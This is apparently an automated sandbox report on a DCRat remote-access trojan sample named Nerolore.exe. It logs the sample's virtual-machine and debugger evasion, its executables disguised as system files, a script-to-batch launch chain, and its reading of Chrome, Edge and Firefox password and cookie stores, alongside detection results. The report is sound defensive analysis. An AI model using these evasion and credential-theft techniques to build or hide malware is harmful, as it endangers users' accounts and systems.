                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\dbg\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\dbg\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\ProgramData\dbg\conhost.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeFile Volume queried: C:\ FullSizeInformation
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946856 NtQueryInformationProcess,GetSystemInfo,0_2_04946856
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 30000
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeThread delayed: delay time: 922337203685477
                              Source: C:\ProgramData\dbg\conhost.exeThread delayed: delay time: 922337203685477
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeThread delayed: delay time: 922337203685477
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\Documents\desktop.ini
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData\Local\Temp
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\AppData\Local
                              Source: C:\FontHost\ContainerAgentWinSession.exeFile opened: C:\Users\user\Desktop\desktop.ini
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                              Source: MxuOpwHgrS.29.drBinary or memory string: discord.comVMware20,11696428655f
                              Source: MxuOpwHgrS.29.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: global block list test formVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                              Source: ContainerAgentWinSession.exe, 00000005.00000002.2296482900.000000001C0FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                              Source: MxuOpwHgrS.29.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                              Source: MxuOpwHgrS.29.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                              Source: MxuOpwHgrS.29.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                              Source: MxuOpwHgrS.29.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                              Source: MxuOpwHgrS.29.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3387054500.000000001AD80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                              Source: MxuOpwHgrS.29.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: outlook.office.comVMware20,11696428655s
                              Source: MxuOpwHgrS.29.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                              Source: MxuOpwHgrS.29.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                              Source: w32tm.exe, 00000028.00000002.2329979953.00000119A22A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                              Source: MxuOpwHgrS.29.drBinary or memory string: AMC password management pageVMware20,11696428655
                              Source: Nerolore.exe, 00000000.00000003.2087463788.000000000098C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\9
                              Source: MxuOpwHgrS.29.drBinary or memory string: tasks.office.comVMware20,11696428655o
                              Source: wscript.exe, 00000002.00000003.2221565780.000000000300F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                              Source: MxuOpwHgrS.29.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                              Source: MxuOpwHgrS.29.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                              Source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                              Source: MxuOpwHgrS.29.drBinary or memory string: dev.azure.comVMware20,11696428655j
                              Source: MxuOpwHgrS.29.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                              Source: Nerolore.exe, Nerolore.exe, 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                              Source: MxuOpwHgrS.29.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                              Source: Nerolore.exe, 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                              Source: MxuOpwHgrS.29.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                              Source: MxuOpwHgrS.29.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                              Source: MxuOpwHgrS.29.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess information queried: ProcessInformation

                              Anti Debugging

                              Source: C:\Users\user\Desktop\Nerolore.exeThread information set: HideFromDebugger
                              Source: C:\Users\user\Desktop\Nerolore.exeOpen window title or class name: ollydbg
                              Source: C:\Users\user\Desktop\Nerolore.exeFile opened: SIWDEBUG
                              Source: C:\Users\user\Desktop\Nerolore.exeFile opened: NTICE
                              Source: C:\Users\user\Desktop\Nerolore.exeFile opened: SICE
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946070 mov eax, dword ptr fs:[00000030h]0_2_04946070
                              Source: C:\Users\user\Desktop\Nerolore.exeCode function: 0_2_04946395 mov eax, dword ptr fs:[00000030h]0_2_04946395
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\dbg\conhost.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\dbg\conhost.exeProcess token adjusted: Debug
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeProcess token adjusted: Debug
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess token adjusted: Debug
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess token adjusted: Debug
                              Source: C:\ProgramData\dbg\conhost.exeProcess token adjusted: Debug
                              Source: C:\FontHost\ContainerAgentWinSession.exeMemory allocated: page read and write | page guard
                              Source: C:\Users\user\Desktop\Nerolore.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe"
                              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" "
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\FontHost\ContainerAgentWinSession.exe "C:\FontHost/ContainerAgentWinSession.exe"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline"
                              Source: C:\FontHost\ContainerAgentWinSession.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP"
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\conhost.exe "C:\Users\All Users\dbg\conhost.exe"
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.000000000293C000.00000004.00000800.00020000.00000000.sdmp, NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 1",5,1,"","user","051829","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\FontHost","65BVNK (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager`
                              Source: NjWYKcLujkVoPzemFBeg.exe, 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N","Cookies Count (1671)":"2","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?"},"5.0.1",5,1,"","user","051829","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\FontHost","65BVNK (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
                              Source: C:\FontHost\ContainerAgentWinSession.exe Queries volume information: C:\FontHost\ContainerAgentWinSession.exe VolumeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\ProgramData\dbg\conhost.exe Queries volume information: C:\ProgramData\dbg\conhost.exe VolumeInformation
                              Source: C:\ProgramData\dbg\conhost.exe Queries volume information: C:\ProgramData\dbg\conhost.exe VolumeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe Queries volume information: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe VolumeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe VolumeInformation
                              Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exe Queries volume information: C:\FontHost\ContainerAgentWinSession.exe VolumeInformation
                              Source: C:\FontHost\ContainerAgentWinSession.exe Queries volume information: C:\FontHost\ContainerAgentWinSession.exe VolumeInformation
                              Source: C:\ProgramData\dbg\conhost.exe Queries volume information: C:\ProgramData\dbg\conhost.exe VolumeInformation
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe Queries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe VolumeInformation
                              Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                              Stealing of Sensitive Information

                              Source: Yara match File source: 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: ContainerAgentWinSession.exe PID: 5344, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: NjWYKcLujkVoPzemFBeg.exe PID: 6968, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: conhost.exe PID: 7260, type: MEMORYSTR
                              Source: Yara match File source: Nerolore.exe, type: SAMPLE
                              Source: Yara match File source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              Source: Yara match File source: Nerolore.exe, type: SAMPLE
                              Source: Yara match File source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                              Remote Access Functionality

                              Source: Yara match File source: 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara match File source: Process Memory Space: ContainerAgentWinSession.exe PID: 5344, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: NjWYKcLujkVoPzemFBeg.exe PID: 6968, type: MEMORYSTR
                              Source: Yara match File source: Process Memory Space: conhost.exe PID: 7260, type: MEMORYSTR
                              Source: Yara match File source: Nerolore.exe, type: SAMPLE
                              Source: Yara match File source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: 00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              Source: Yara match File source: Nerolore.exe, type: SAMPLE
                              Source: Yara match File source: 5.0.ContainerAgentWinSession.exe.a40000.0.unpack, type: UNPACKEDPE
                              Source: Yara match File source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe, type: DROPPED
                              Source: Yara match File source: C:\ProgramData\dbg\conhost.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, type: DROPPED
                              Source: Yara match File source: C:\FontHost\ContainerAgentWinSession.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information11
                              Scripting
                              Valid Accounts241
                              Windows Management Instrumentation
                              11
                              Scripting
                              1
                              DLL Side-Loading
                              1
                              Disable or Modify Tools
                              1
                              OS Credential Dumping
                              2
                              File and Directory Discovery
                              1
                              Taint Shared Content
                              1
                              Archive Collected Data
                              1
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job
                              1
                              DLL Side-Loading
                              12
                              Process Injection
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory135
                              System Information Discovery
                              Remote Desktop Protocol1
                              Data from Local System
                              2
                              Non-Application Layer Protocol
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              Scheduled Task/Job
                              1
                              Scheduled Task/Job
                              3
                              Obfuscated Files or Information
                              Security Account Manager541
                              Security Software Discovery
                              SMB/Windows Admin Shares1
                              Clipboard Data
                              12
                              Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron21
                              Registry Run Keys / Startup Folder
                              21
                              Registry Run Keys / Startup Folder
                              14
                              Software Packing
                              NTDS2
                              Process Discovery
                              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              DLL Side-Loading
                              LSA Secrets461
                              Virtualization/Sandbox Evasion
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                              File Deletion
                              Cached Domain Credentials1
                              Application Window Discovery
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items33
                              Masquerading
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job461
                              Virtualization/Sandbox Evasion
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                              Process Injection
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              Behavior Graph (ID: 1498674, Sample: Nerolore.exe, Start date: 25/08/2024, Architecture: WINDOWS, Score: 100)

                              Source | Detection | Scanner | Label | Link
                              Nerolore.exe | 79% | ReversingLabs | Win32.Trojan.DCRat |
                              Nerolore.exe | 67% | Virustotal | | Browse
                              Nerolore.exe | 100% | Avira | VBS/Runner.VPG |
                              Nerolore.exe | 100% | Joe Sandbox ML | |
                              Source | Detection | Scanner | Label | Link
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe | 100% | Avira | VBS/Runner.VPG |
                              C:\Users\user\Desktop\XwBnJZqg.log | 100% | Avira | TR/PSW.Agent.qngqt |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\Desktop\GeIICmFp.log | 100% | Avira | TR/PSW.Agent.qngqt |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\ProgramData\dbg\conhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\Desktop\ONhXawky.log | 100% | Avira | HEUR/AGEN.1300079 |
                              C:\Users\user\Desktop\xvosSKAI.log | 100% | Avira | HEUR/AGEN.1300079 |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat | 100% | Avira | BAT/Delbat.C |
                              C:\FontHost\ContainerAgentWinSession.exe | 100% | Avira | HEUR/AGEN.1323342 |
                              C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exe | 100% | Joe Sandbox ML | |
                              C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\XwBnJZqg.log | 100% | Joe Sandbox ML | |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 100% | Joe Sandbox ML | |
                              C:\Users\user\Desktop\GeIICmFp.log | 100% | Joe Sandbox ML | |
                              C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
                              C:\FontHost\NjWYKcLujkVoPzemFBeg.exe | 100% | Joe Sandbox ML | |
                              C:\ProgramData\dbg\conhost.exe | 100% | Joe Sandbox ML | |
